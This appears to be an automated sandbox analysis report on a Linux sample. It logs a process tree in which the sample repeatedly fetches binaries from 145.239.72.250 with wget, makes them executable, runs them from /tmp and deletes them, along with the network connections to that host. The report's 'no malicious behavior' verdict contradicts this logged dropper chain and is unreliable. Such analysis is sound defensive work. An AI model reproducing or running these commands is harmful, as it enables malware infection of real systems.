Analysis Overview
SHA256
e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
Threat Level: No (potentially) malicious behavior was detected
The file b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-16 23:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:49
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
129s
Command Line
Signatures
Processes
/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
[/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]
/usr/bin/wget
[wget http://145.239.72.250/ntpd]
/bin/chmod
[chmod +x ntpd]
/tmp/ntpd
[./ntpd]
/bin/rm
[rm -rf ntpd]
/usr/bin/wget
[wget http://145.239.72.250/sshd]
/bin/chmod
[chmod +x sshd]
/tmp/sshd
[./sshd]
/bin/rm
[rm -rf sshd]
/usr/bin/wget
[wget http://145.239.72.250/openssh]
/bin/chmod
[chmod +x openssh]
/tmp/openssh
[./openssh]
/bin/rm
[rm -rf openssh]
/usr/bin/wget
[wget http://145.239.72.250/bash]
/bin/chmod
[chmod +x bash]
/tmp/bash
[./bash]
/bin/rm
[rm -rf bash]
/usr/bin/wget
[wget http://145.239.72.250/tftp]
/bin/chmod
[chmod +x tftp]
/tmp/tftp
[./tftp]
/bin/rm
[rm -rf tftp]
/usr/bin/wget
[wget http://145.239.72.250/wget]
/bin/chmod
[chmod +x wget]
/tmp/wget
[./wget]
/bin/rm
[rm -rf wget]
/usr/bin/wget
[wget http://145.239.72.250/cron]
/bin/chmod
[chmod +x cron]
/tmp/cron
[./cron]
/bin/rm
[rm -rf cron]
/usr/bin/wget
[wget http://145.239.72.250/ftp]
/bin/chmod
[chmod +x ftp]
/tmp/ftp
[./ftp]
/bin/rm
[rm -rf ftp]
/usr/bin/wget
[wget http://145.239.72.250/pftp]
/bin/chmod
[chmod +x pftp]
/tmp/pftp
[./pftp]
/bin/rm
[rm -rf pftp]
/usr/bin/wget
[wget http://145.239.72.250/sh]
/bin/chmod
[chmod +x sh]
/tmp/sh
[./sh]
/bin/rm
[rm -rf sh]
/usr/bin/wget
[wget http://145.239.72.250/ ]
/bin/chmod
[chmod +x ]
/tmp/
[./ ]
/bin/rm
[rm -rf ]
/usr/bin/wget
[wget http://145.239.72.250/apache2]
/bin/chmod
[chmod +x apache2]
/tmp/apache2
[./apache2]
/bin/rm
[rm -rf apache2]
/usr/bin/wget
[wget http://145.239.72.250/telnetd]
/bin/chmod
[chmod +x telnetd]
/tmp/telnetd
[./telnetd]
/bin/rm
[rm -rf telnetd]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| FR | 145.239.72.250:80 | 145.239.72.250 | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 151.101.65.91:443 | tcp | |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| GB | 89.187.167.3:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 195.181.164.20:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:50
Platform
debian9-armhf-20240611-en
Max time network
38s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| FR | 145.239.72.250:80 | 145.239.72.250 | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:47
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:47
Platform
debian9-mipsel-20240611-en